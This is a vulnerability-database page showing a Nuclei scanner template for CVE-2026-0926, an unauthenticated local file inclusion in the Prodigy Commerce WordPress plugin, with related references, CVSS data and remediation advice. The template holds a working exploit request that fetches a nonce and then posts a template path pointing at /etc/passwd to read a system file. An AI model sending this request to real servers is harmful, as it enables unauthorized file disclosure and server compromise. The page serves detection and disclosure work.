Lucene search
K

Prodigy Commerce <= 3.3.0 - Local File Inclusion

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Prodigy Commerce WordPress plugin local file inclusion enables unauthenticated remote code execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
exploit-arsenal
23 Jun 202608:55
githubexploit
GithubExploit
Exploit for CVE-2026-0926
23 May 202621:29
githubexploit
GithubExploit
Exploit for CVE-2026-0926
23 May 202621:29
githubexploit
Circl
CVE-2026-0926
19 Feb 202606:00
circl
CNNVD
WordPress plugin Prodigy Commerce 安全漏洞
19 Feb 202600:00
cnnvd
CVE
CVE-2026-0926
19 Feb 202604:36
cve
Cvelist
CVE-2026-0926 Prodigy Commerce <= 3.3.0 - Unauthenticated Local File Inclusion via parameters[template_name]
19 Feb 202604:36
cvelist
Exploit DB
Prodigy Commerce 3.3.0 - Local File Inclusion
29 May 202600:00
exploitdb
NVD
CVE-2026-0926
19 Feb 202607:17
nvd
Packet Storm
📄 WordPress Prodigy Commerce 3.2.9 Local File Inclusion
29 May 202600:00
packetstorm
Rows per page
id: CVE-2026-0926

info:
  name: Prodigy Commerce <= 3.3.0 - Local File Inclusion
  author: Shivam Kamboj
  severity: critical
  description: |
    Prodigy Commerce WordPress plugin <= 3.2.9 contains a local file inclusion caused by improper sanitization of 'parameters[template_name]' parameter, letting unauthenticated attackers include and execute arbitrary files remotely.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code, bypass access controls, and access sensitive data, potentially leading to full server compromise.
  remediation: |
    Update to the latest version beyond 3.2.9.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/prodigy-commerce/prodigy-commerce-329-unauthenticated-local-file-inclusion-via-parameterstemplate-name
    - https://nvd.nist.gov/vuln/detail/CVE-2026-0926
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-0926
    epss-score: 0.09396
    epss-percentile: 0.94808
    cwe-id: CWE-98
  metadata:
    max-request: 2
    verified: true
  tags: cve,cve2026,wordpress,wp,wp-plugin,lfi,prodigy-commerce,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'var settings\s*=\s*\{[^}]*"nonce"\s*:\s*"([a-f0-9]+)"'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=prodigy-render-my-account-widget&nonce={{nonce}}&parameters[template_name]=etc/passwd&parameters[default_path]=/

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ca2a76f4b5289689fdc066e64be81cf401ef1c90070674a88e6de27d0f07044f02207dcabb215e19b4efaf0784299bfeee963640505243d8a1df7c8bdf0a929e1285:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Mar 2026 16:05Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.19.8
EPSS0.09396
SSVC
15